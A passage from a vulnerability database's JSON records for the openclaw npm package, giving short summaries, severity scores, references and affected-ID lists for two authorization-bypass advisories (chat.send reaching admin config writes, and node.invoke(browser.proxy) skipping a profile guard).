`operator.write` chat.send could reach admin-only config writes\nA gateway client authenticated with `operator.write` could route `/config set` or `/config unset` through `chat.send` and reach persistent config mutation even though direct config RPC methods are 
admin-scoped.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/5f8f58ae25e2a78f31b06edcf26532d634ca554e","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/5f8f58ae25e2a78f31b06edcf26532d634ca554e"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://github.com/advisories/GHSA-hfpr-jhpq-x4rm","reference_id":"GHSA-hfpr-jhpq-x4rm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hfpr-jhpq-x4rm"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hfpr-jhpq-x4rm","reference_id":"GHSA-hfpr-jhpq-x4rm","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hfpr-jhpq-x4rm"}],"fixed_packages":[{"url":"htt
p://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerabi
lity":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerabi
lity":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerabi
lity":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerabi
lity":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerabi
lity":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerabi
lity":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["GHSA-hfpr-jhpq-x4rm"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-m46m-y19r-2kd2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89934?format=json","vulnerability_id":"VCID-ma62-gtan-97au","summary":"## Impact\n\nOpenClaw `node.invoke(browser.proxy)` bypasses `browser.request` persistent profile-mutation guard.\n\nnode.invoke(browser.proxy) could mutate persistent browser profiles through a path that bypassed the browser.request guard.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= v2026.04.01`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. 
The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @nicky-cc  of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42431","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11153","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11187","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11193","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42431"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track"
,"scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:12:10Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cmfr-9m2r-xwhq","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:12:10Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cmfr-9m2r-xwhq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42431","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42431"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-persistent-profile-mutation-via-node-invoke-browser-proxy-bypass","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"7.6","scoring_system"
:"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:12:10Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-persistent-profile-mutation-via-node-invoke-browser-proxy-bypass"},{"reference_url":"https://github.com/advisories/GHSA-cmfr-9m2r-xwhq","reference_id":"GHSA-cmfr-9m2r-xwhq","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cmfr-9m2r-xwhq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability
":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu